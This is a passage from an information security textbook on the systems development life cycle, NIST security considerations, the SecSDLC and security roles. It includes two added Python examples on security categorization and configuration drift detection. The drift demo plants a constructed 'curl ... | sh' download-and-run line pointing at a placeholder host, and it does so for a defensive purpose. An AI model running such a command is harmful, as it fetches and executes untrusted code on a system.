additional expertise, organizational knowledge, or other resources.
Once the system is up and running, it is maintained (and modified) for the rest of its life. Because
the cycle is repeated over time, every information system implementation may go through
several iterations. Only through ongoing analysis and renewal can it adapt to the constantly
changing environment in which it is positioned. Each phase of the classic SDLC is described below.

INVESTIGATION. The first phase, investigation, is the most important. What is the objective of
the system being developed? The investigation phase begins with an evaluation of the event or
plan that started the process. The project's objectives, constraints, and scope are defined
during this phase. A preliminary cost-benefit analysis evaluates the perceived benefits and the
acceptable cost levels for those benefits. At the end of this phase, and of every subsequent
phase, a feasibility study analyzes the economic, technical, and behavioral feasibility of the
process and confirms that it is worth the organization's time and effort to pursue.
ANALYSIS. The information gathered during the investigation phase is used to begin the
analysis step. The organization's current systems, as well as its ability to support the new
systems, are the focus of this phase. The first step for analysts is to figure out what the new
system will be able to achieve and how it will interact with the old ones. The findings are
documented, and the feasibility analysis is updated at the end of this phase.
LOGICAL DESIGN. In the logical design phase, the information collected from the analysis phase
is used to begin constructing a systems solution for a business problem. The first and most
important component in every system solution is the business need. Based on the business
need, applications are chosen to provide the needed services, and then data support and
structures capable of supplying the required inputs are chosen. Finally, particular technologies
for implementing the physical solution are identified based on all of the foregoing. As a result,
the logical design serves as a blueprint for achieving the desired result. There are no references
to specific technologies, vendors, or products in the logical design, because it is
implementation independent. Instead, it focuses on how the proposed system will
help to solve the problem at hand. Analysts create a number of different solutions, each with
its own set of advantages and disadvantages, as well as prices and benefits, allowing for a
broad comparison of the possibilities available. Another feasibility study is carried out at the
end of this phase.

PHYSICAL DESIGN. Specific technologies are chosen during the physical design phase to
support the options identified and evaluated in the logical design. The chosen components are
assessed using a make-or-buy decision (develop the components in-house or purchase them
from a vendor).
Various components and technologies are integrated into the final designs. The full solution is
given to the organizational management for approval after yet another feasibility analysis.
IMPLEMENTATION. Any required software is produced during the implementation phase.
Components are ordered, received, and tested. Following that, users are trained and
documentation is generated. All components are individually tested before being fitted together
and tested as a system. A feasibility analysis is completed once more, and the system is given to
the sponsors for a performance evaluation and acceptance test.
MAINTENANCE AND CHANGE. The maintenance and change phase is the most time-consuming
and costly part of the process. The tasks required to support and change the system for the
balance of its useful life cycle are included in this phase. Despite the fact that formal
development may be completed during this phase, the project's life cycle continues until it is
judged that the process should be restarted from the investigation phase. The system is
examined for compliance at regular intervals, and the viability of continuing versus
discontinuing it is assessed. Upgrades, patches, and updates are all taken care of. The systems that support the
organization must change as the organization's needs change. Those in charge of the systems,
as well as those who support them, must constantly monitor the systems' effectiveness in
relation to the organization's environment. When a present system can no longer support the
organization's evolving mission, the project is ended and a new one is started.
SECURING THE SDLC. The security of the system being created, as well as the information it
consumes, should be considered during each phase of the SDLC. The implementing
organization is responsible for ensuring that the system is utilized securely, whether it is
custom and designed from scratch, purchased, and subsequently adapted, or commercial off-
the-shelf software (COTS). This means that any system deployment must be safe and must not
jeopardize the confidentiality, integrity, or availability of the organization's information assets.
The section below, adapted from NIST Special Publication 800-64, rev. 1, gives an overview of
security considerations for each phase of the SDLC.
Each of the example SDLC phases [covered previously] has a minimal set of security
procedures that must be completed in order to properly integrate security into a system
throughout development. An organization will either employ the standard SDLC outlined
[before] or construct a customized SDLC to match their specific needs. In either scenario, NIST
advises companies to incorporate the following IT security considerations into their
development process:

Investigation/Analysis Phases

1. Security categorization: defines three levels of potential impact on organizations or
individuals should there be a breach of security (a loss of confidentiality, integrity, or
availability): low, moderate, or high. Organizations can use security categorization standards
to help them choose the right security controls for their information systems.
2. Preliminary risk assessment- results in a first description of the system's basic security
requirements. The danger environment in which the system will function should be defined
by a preliminary risk assessment.
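The security categorization item above is easier to grasp with the computation written out. The following is an added example, not part of the lesson or of NIST's text. It assumes the high-water-mark rule of FIPS 199 and SP 800-60 (not named on the page): every information type the system handles is rated LOW, MODERATE or HIGH for the loss of each of confidentiality, integrity and availability; the system inherits the highest rating per objective, and its overall impact level is the highest of those three. The information types, their ratings and the system name are constructed sample data.

```python
"""Security categorization of an information system (added example).

Assumes the FIPS 199 / SP 800-60 high-water-mark rule: the system's rating
for each objective is the highest rating of any information type it handles,
and the overall impact level is the highest of the three objectives.
All information types and ratings below are constructed sample data.
"""
from dataclasses import dataclass

LEVELS = ("LOW", "MODERATE", "HIGH")  # ordered from least to most impact
OBJECTIVES = ("confidentiality", "integrity", "availability")


def _validate(level):
    """Reject anything that is not one of the three impact levels."""
    if level not in LEVELS:
        raise ValueError(f"impact level must be one of {LEVELS}, got {level!r}")
    return level


@dataclass(frozen=True)
class InfoType:
    """One information type and its provisional impact rating per objective."""
    name: str
    confidentiality: str
    integrity: str
    availability: str

    def __post_init__(self):
        for objective in OBJECTIVES:
            _validate(getattr(self, objective))


def high_water_mark(levels):
    """Return the highest impact level among the given levels."""
    levels = list(levels)
    if not levels:
        raise ValueError("at least one impact level is required")
    return max(levels, key=LEVELS.index)


def categorize_system(info_types):
    """Derive the system's security category from its information types.

    Returns a dict with the impact level for each objective plus "system",
    the overall level that drives the choice of a baseline of controls.
    """
    if not info_types:
        raise ValueError("a system must handle at least one information type")
    category = {
        objective: high_water_mark(getattr(t, objective) for t in info_types)
        for objective in OBJECTIVES
    }
    category["system"] = high_water_mark(category[o] for o in OBJECTIVES)
    return category


def format_category(system_name, category):
    """Render the category in the SC notation used by FIPS 199."""
    parts = ", ".join(f"({o}, {category[o]})" for o in OBJECTIVES)
    return f"SC {system_name} = {{{parts}}}"


# Constructed sample: a small e-commerce system (hypothetical data).
SAMPLE_TYPES = [
    InfoType("customer records", "HIGH", "MODERATE", "LOW"),
    InfoType("public web content", "LOW", "MODERATE", "MODERATE"),
    InfoType("order processing", "MODERATE", "HIGH", "MODERATE"),
]

if __name__ == "__main__":
    result = categorize_system(SAMPLE_TYPES)
    print(format_category("e-commerce system", result))
    print("overall impact level:", result["system"])
```

The point worth noticing is that a single HIGH rating on any one information type pulls the whole system to HIGH for that objective, which is why teams are tempted to split such data into a separate system rather than carry the HIGH baseline across everything.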

Logical/Physical Design Phases

1. Risk assessment: an examination that uses a formal risk assessment process to determine
the system's protection requirements. This analysis expands on the preliminary risk assessment
conducted during the investigation phase (NIST's Initiation phase), but it is more detailed and specific.

2. Security functional requirements analysis: an examination of requirements that could
comprise the following elements: (1) the system security environment (i.e., enterprise
information security policy and enterprise security architecture) and (2) security functional
requirements.

3. Security assurance requirements analysis: an examination of the requirements that address
the developmental activities and assurance evidence required to achieve the appropriate level
of confidence that the information security system functions correctly and effectively. The
analysis is used to determine how much and what kind of assurance are required, based on
legal and functional security requirements.

4. Cost and reporting considerations- determines how much of the development cost may
be attributable to information security across the system's life cycle. Hardware, software,
staff, and training are all included in these expenditures.

5. Security planning guarantees that all agreed-upon security controls are thoroughly
documented whether they are planned or already in existence. The security plan also includes
attachments or references to key documents that support the agency's information security
program (e.g., configuration management plan, contingency plan, incident response plan,
security awareness and training plan, rules of behavior, risk assessment, security test
and evaluation results, system interconnection agreements, security authorizations/
accreditation).
6. Security control development entails designing, developing, and implementing the security
controls outlined in the respective security plans. For presently operational information
systems, security plans may call for the establishment of additional security controls to
enhance the controls already in place or the modification of chosen measures that are
deemed ineffective.

7. Developmental security test and evaluation. Security measures designed for a new
information system are tested and evaluated during development to ensure that they are
performing properly and effectively. Some security controls (mostly non-technical controls)
cannot be verified and evaluated until the information system is operational; these controls
are mainly management and operational controls.
8. Other planning components: ensures that when implementing security into the life cycle, all
necessary components of the development process are taken into account. Selection of the
proper contract type, participation of all relevant functional groups within an organization,
participation of the certifier and accreditor, and development and implementation of necessary
contracting strategies and processes are some of these components.
Implementation Phase

1. Inspection and acceptance guarantee that the organization validates and verifies that the
deliverables include the functionality described in the specification.

2. System integration ensures that the information system is integrated at the operational site
where it will be deployed for use. Security control settings and switches are enabled in
accordance with vendor instructions and available security implementation guidance.

3. Security certification ensures that controls are effectively applied through established
verification methodologies and procedures, giving organization authorities confidence that
adequate safeguards and countermeasures are in place to protect the organization's
information system. Security certification also identifies and defines the information system's
known weaknesses.

4. Security accreditation: provides an information system with the essential security
authorization to process, store, or transmit information. This permission is provided by a
senior organization official and is based on the verification of security controls' efficacy to a
certain level of assurance and the identification of a residual risk to agency assets or
operations.
Maintenance and Change Phase

1. Configuration management and control guarantees that the potential security implications
of specific changes to an information system or its surrounding environment are adequately
considered. Configuration management and configuration control methods are essential for
establishing an initial baseline of hardware, software, and firmware components for the
information system, as well as regulating and keeping an accurate inventory of any system
changes.

2. Continuous monitoring- ensures that controls remain successful in their application by


testing and evaluating them on a regular basis. A comprehensive information security
program must include security control monitoring (i.e., confirming the continuous
effectiveness of such controls over time) and reporting the security status of the information
system to appropriate agency personnel.

3. Information preservation: ensures that data are kept for as long as they are needed to comply
with present legal obligations and to accommodate future technological advances that may
make the retrieval technique outdated.

4. Media sanitization: ensures that data are deleted, erased, and written over as necessary.

5. Disposal of hardware and software: ensures that hardware and software are disposed of
according to the information system security officer's instructions.

"Adapted from Information System Development Life Cycle Security Considerations"


Information security must be built into a system from the beginning, rather than being added
during or after the implementation phase. Security features are often introduced as an
afterthought to information systems that were intended without them. This necessitates
ongoing patching, upgrading, and maintenance to keep the systems and data safe. With the
adage "an ounce of prevention is worth a pound of cure" in mind, businesses are shifting to
more security-focused development methodologies, hoping to boost not only the performance
of their existing systems, but also consumer confidence in their products. Microsoft basically
halted development on many of its products in early 2002 while putting its OS developers,
testers, and program managers through a rigorous program focusing on secure software
development. It also postponed the release of its flagship server operating system in order to
address security concerns. Many more companies are following Microsoft's lead in
incorporating security into the development process.
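The configuration management and continuous monitoring items in the Maintenance and Change phase above rest on one concrete mechanism: an initial baseline of the deployed components and a way to detect changes against it. The following is an added example, not code from the lesson or from NIST. It records a baseline of every regular file under a root (relative path and SHA-256 digest), re-scans later, and reports what was added, removed or modified. The directory tree, file contents and the "unauthorized changes" in demo() are constructed for illustration, and the directory and file names are hypothetical.

```python
"""Configuration baseline and drift detection (added example).

Records path -> SHA-256 for every regular file under a root, then compares a
later scan against that baseline. The tree built in demo() is constructed.
"""
import hashlib
import tempfile
from pathlib import Path


def file_digest(path):
    """SHA-256 of a file, read in chunks so large binaries do not fill memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root):
    """Map every regular file under root (relative POSIX path) to its digest.

    Symlinks are skipped so that a link pointing outside the tree cannot make
    the baseline read, or later "verify", files that are not part of the system.
    """
    root = Path(root)
    baseline = {}
    for path in sorted(root.rglob("*")):
        if path.is_symlink() or not path.is_file():
            continue
        baseline[path.relative_to(root).as_posix()] = file_digest(path)
    return baseline


def compare_to_baseline(baseline, current):
    """Return the added, removed and modified paths between two scans."""
    known, seen = set(baseline), set(current)
    return {
        "added": sorted(seen - known),
        "removed": sorted(known - seen),
        "modified": sorted(p for p in known & seen if baseline[p] != current[p]),
    }


def demo():
    """Build a tiny constructed system tree, baseline it, tamper, re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "etc").mkdir()
        (root / "bin").mkdir()
        (root / "etc" / "sshd_config").write_text("PermitRootLogin no\n")
        (root / "etc" / "hosts").write_text("127.0.0.1 localhost\n")
        (root / "bin" / "agent").write_bytes(b"\x7fELF constructed stand-in for a binary")

        baseline = build_baseline(root)  # captured when the system was accredited

        # Changes made outside configuration control (all constructed):
        (root / "etc" / "sshd_config").write_text("PermitRootLogin yes\n")  # weakened
        (root / "etc" / "hosts").unlink()                                   # deleted
        (root / "bin" / "cron.sh").write_text("curl http://example.invalid/x | sh\n")  # dropped in

        return compare_to_baseline(baseline, build_baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9s} {paths}")
```

In practice the baseline is stored off the monitored host and signed, so an intruder who alters a file cannot also alter the record it is checked against; the comparison itself is the same as above.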
The Security Systems Development Life Cycle

The typical SDLC phases can be altered to help with the implementation of an information
security project. While the objective and exact operations of the two processes may alter, the
underlying methodology remains the same. Implementing information security entails
recognizing specific dangers and putting in place precise procedures to counter them. This
process is unified by the SecSDLC, which turns it into a coherent program rather than a
sequence of seemingly unrelated actions. (Other firms develop information security systems
using a risk management approach.)
INVESTIGATION. The SecSDLC's investigation phase begins with a directive from senior
management that specifies the project's methodology, outputs, and goals, as well as its budget
and other constraints. Typically, this phase starts with an enterprise information security policy
(EISP), which describes how a security program will be implemented within the company.
Teams of responsible managers, employees, and contractors are organized; problems are
analyzed; and the scope of the project, as well as specific goals and objectives and any
additional constraints not covered by the program policy, are defined. Finally, an organizational
feasibility analysis is carried out to see if the business has the resources and commitment
required to complete a successful security analysis and design.
ANALYSIS. The documents from the investigation phase are examined in the analysis step. A
preliminary study of existing security policies or programs, as well as documented current
threats and associated controls, is conducted by the development team. This phase also
includes a review of any applicable legal problems that may have an impact on the security
solution's design.
Privacy rules are increasingly being taken into account when making judgments about
information systems that handle personal data. Many states have recently enacted legislation
prohibiting certain computer-related activities. It is critical to have a thorough awareness of
these concerns. In this stage, risk management also begins. Risk management is the process of
recognizing, assessing, and evaluating the organization's levels of risk, particularly threats to
the organization's security and the information it stores and processes.
LOGICAL DESIGN. The logical design phase creates and develops the information security
blueprints, and it examines and implements key policies that influence later decisions. At this
point the team also plans incident response actions in the case of a partial or catastrophic
loss. The planning addresses the following questions:

1. Continuity planning: How will your business continue if you suffer a setback?
2. Incident Response. When an attack occurs, what measures are taken to respond?
3. Disaster Recovery. What should be done as soon as possible following a disaster to
restore information and essential systems?
The next step is to conduct a feasibility analysis to decide whether the project should be
continued or outsourced.
PHYSICAL DESIGN. The physical design phase evaluates the information security technologies
needed to support the logical design blueprint, generates alternative solutions, and selects a
final design. When the physical design is finished, the information security blueprint may be
revised to keep it in line with the changes that are required. Criteria for judging what counts as
a successful solution are also developed during this phase, and the designs for the physical
security measures that support the proposed technology solutions are included at this time. At
the end of this phase, a feasibility study assesses the organization's readiness for the proposed
project, and the design is then submitted to the champion and sponsors. Before the project is
implemented, all parties involved have the opportunity to approve it.
IMPLEMENTATION. The SecSDLC's implementation phase is likewise similar to that of the
standard SDLC. Security solutions are acquired (made or bought), tested, implemented, and then
tested again. Personnel issues are assessed, and training and education programs are
conducted. Finally, senior management is presented with the fully tested package for final
approval.
MAINTENANCE AND CHANGE. Given the present ever-changing threat environment,
maintenance and change is the final, but maybe most critical, phase. Information security
systems must be constantly monitored, tested, modified, updated, and repaired in today's
world. Traditional SDLC-based application systems are not built to anticipate a software attack
that necessitates some level of application reconstruction. The fight for solid, reliable systems
in information security is a defensive one. Repairing damage and restoring data is frequently a
never-ending battle against an unseen foe. To prevent attacks from successfully infiltrating
sensitive data, an organization's information security profile must constantly adjust as new
threats emerge and old threats evolve. This constant vigilance and security can be compared
to that of a castle, where threats from the outside as well as the inside must be constantly
watched and verified using new and more sophisticated technologies.
The steps in both the systems development life cycle and the security systems development life
cycle are summarized in Table 1-2. The steps in the security systems development life cycle are
comparable to those in the systems development life cycle, so those common to both cycles are
listed in column 2. Column 3 lists the steps performed in each phase of the security systems
development life cycle that are specific to that phase.

Security Professionals and the Organization

SENIOR MANAGEMENT. The chief information security officer (CISO) is in charge of the organization's information
security evaluation, management, and implementation. The CISO is also known as the IT
security manager, the security administrator, or a similar title. Although the CISO normally
reports directly to the CIO, it is not uncommon for one or more layers of administration to exist
between the two in bigger firms. The CISO's suggestions to the CIO, on the other hand, must be
accorded equal priority, if not more, than other technology and information-related ideas. The
placement of the CISO and supporting security personnel in organizational hierarchies is a hot
topic in the security sector right now.

Information Security Project Team

The information security project team should include a diverse group of people with expertise
in one or more of the required technical and non-technical domains. Designing security
necessitates many of the same skills as managing and implementing it. The following roles are
filled by members of the security project team:

1. Champion: A senior executive who promotes the project and secures its financial and
administrative support at the highest levels of the company.

2. Team leader: A project manager who understands project management, personnel management,
and the technical requirements of information security, such as a departmental line manager or
staff unit manager.

3. Security policy developers: People who understand the corporate culture, existing policies,
and the requirements for developing and implementing successful policies.

4. Risk assessment specialists: People who understand financial risk assessment methodologies,
the value of organizational assets, and the security methods to be applied.

5. Security professionals: Dedicated, well-trained, and well-educated specialists in all aspects
of information security, both technical and non-technical.

6. Systems administrators: People with primary responsibility for administering the systems
that house the organization's information.

7. End users: Those who will be most affected by the new system. Ideally, a team of users from
various departments, levels, and degrees of technical knowledge should help the project team
focus on deploying realistic controls in ways that do not interrupt the critical business
activities they are trying to protect.

Data Responsibilities

The following are the three categories of data ownership and their associated responsibilities:

1. Data owners: Those who are in charge of the protection and usage of a particular set of data.
They are typically CIOs or members of senior management. The level of protection the data
requires, and the changes to it brought about by organizational change, are normally determined
by the data owners. The data owners collaborate with subordinate managers to manage the data on
a day-to-day basis.

2. Data custodians: Working directly with data owners, data custodians are in charge of the
information's storage, maintenance, and security. Depending on the size of the firm, this may be
a dedicated position, such as the CISO, or an additional role of a systems administrator or other
technology manager. Overseeing data storage and backups, applying the specific procedures and
rules spelled out in the security policies and plans, and reporting to the data owner are all
common responsibilities of a data custodian.

3. Data users: End users who work with data to accomplish their assigned duties in support of
the organization's mission. Data users are included here as individuals with an information
security responsibility because everyone in the organization is accountable for data security.

Communities of Interest

Each company creates and maintains its own culture and values. There are communities of
interest that arise and evolve within each organizational culture. A community of interest, as
described above, is a group of persons within an organization who are joined by similar interests
or beliefs and who have a common purpose of assisting the organization in meeting its
objectives. While an organization may have many different communities of interest, this book
identifies the three most common, each of which has duties and responsibilities in information
security. In theory, each position should complement the others; however, this is rarely the case
in practice.

Information Security Management and Professionals

The goals and mission of the information security community of interest are aligned with the
roles of information security professionals. These job functions and organizational roles are
concerned with the security of the organization's information systems and stored data.

Information Technology Management and Professionals

IT managers and skilled professionals in systems design, programming, networks, and other
related fields constitute a community of interest with many of the same goals as the
information security community. However, its members are more concerned with the costs of
system development and operation, ease of use for system users, the timeliness of system
development, and transaction response time. The goals of the IT community and the goals of the
information security community are not always in sync, and depending on the organizational
structure this can lead to conflict.

Organizational Management and Professionals

The other primary community of interest is made up of the organization's general management
staff and the rest of the organization's personnel. Executive management, production
management, human resources, accounting, and legal are just a few of the subsets of this large
group, and each of them almost always contains members of other communities of interest as
well. The IT community frequently views these groups as consumers of information technology
systems, whereas the information security community views them as subjects of security
controls. In fact, this community serves as the best reminder that all IT systems and
information security goals exist to help the larger business community achieve its goals.

Is Information Security a Science or an Art?

Given the complexity of today's information systems, information security implementation is
sometimes described as a blend of art and science.

System technologists, particularly those with a talent for managing and controlling computers
and computer-based systems, have long been suspected of employing a little magic to keep the
systems running as they should. In the field of information security, such technicians are
sometimes called security artisans.

Security as Art

The administrators and professionals in charge of security can be compared to a painter working
with oils on canvas: a touch of color here, a brush stroke there, just enough to convey the
image the artist intends without overwhelming the viewer or, in security terms, without
restricting user access excessively. There are few universally accepted complete solutions, and
there are no hard and fast rules governing the installation of the various security devices.
While there are numerous manuals to support individual systems, there is none for deploying
security across a whole network. This is especially true given the high degree of interaction
between users, policies, and technological controls.

Security as Science

Technology developed by computer scientists and engineers, and engineered for rigorous
performance levels, makes information security a science as well as an art. Most scientists
agree that specific conditions cause virtually all actions in computer systems. Almost every
fault, security hole, and system malfunction is the result of specific hardware and software
interacting. If the developers had sufficient time, these faults could be resolved and
eliminated.

The remaining faults are usually the result of technology failing for one of a thousand
different reasons. There are numerous recognized and certified security approaches and
procedures available, as well as competent technical security advice. Best practices, standards
of due care, and other tried-and-true procedures can reduce the amount of guesswork involved in
securing an organization's data and systems.

Security as a Social Science

A third viewpoint to consider is information security as a social science, which combines
elements of art and science and adds a new dimension to the issue. Social science studies the
behavior of individuals as they interact with systems, whether societal systems or, in this
case, information systems. People inside the business and people who interact with the system,
whether purposefully or unintentionally, are at the heart of information security. End users who
need the data that security personnel are trying to protect can be the weakest link in the
security chain.

By understanding some of the behavioral aspects of organizational science and change
management, security managers can considerably lower the levels of risk produced by end users
and establish more acceptable and supportable security profiles. These methods, when combined
with appropriate policy and training, can significantly improve end-user behavior and result in
a more secure information system.
